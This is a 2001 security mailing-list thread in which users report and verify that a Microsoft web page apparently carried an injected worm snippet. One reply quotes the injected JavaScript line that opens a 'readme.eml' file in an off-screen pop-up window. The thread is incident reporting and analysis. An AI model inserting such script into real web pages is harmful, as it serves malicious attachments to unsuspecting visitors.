RE: Please tell me I'm wrong: microsoft.com infected

["Boyan Krosnov" <bkrosnov () lirex bg>]

Most probably .eml-s don't get distributed through AKAMAI. And that
saves the unpatched users.

Have fun,
Boyan

> -----Original Message-----
> From: Jon Zobrist [mailto:kgb () ussr com]
> Sent: Thursday, September 20, 2001 1:17 AM
> To: Steve Cody; incidents () securityfocus com
> Subject: Re: Please tell me I'm wrong: microsoft.com infected
>
>
> Verified...
>
> source on page includes .eml on the bottom...
> <html><script language="JavaScript">window.open("readme.eml", null, 
> "resizable=no,top=6000,left=6000")</script></html>
>
> Although the page the pop up on mine said, 404:page not 
> found...So they must 
> have removed the readme.eml
>
> -Jon
>
> RedHat 7.1
> Mozilla 0.9.3
>
>
> On Wednesday 19 September 2001 01:37 pm, Steve Cody wrote:
> > I just went to http://www.microsoft.com/frontpage, and my Symantec
> > Norton Antivirus popped up and denied access to readme.eml.
> >
> > I could not view the source of the loaded page, so I can't 
> verify that
> > it is definitely infected.
> >
> > Steve
> --------------------------------------------------------------
> -------------
> > - This list is provided by the SecurityFocus ARIS analyzer service.
> > For more information on this free incident handling, management
> > and tracking system please see: http://aris.securityfocus.com
>
> --------------------------------------------------------------
> --------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management 
> and tracking system please see: http://aris.securityfocus.com

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com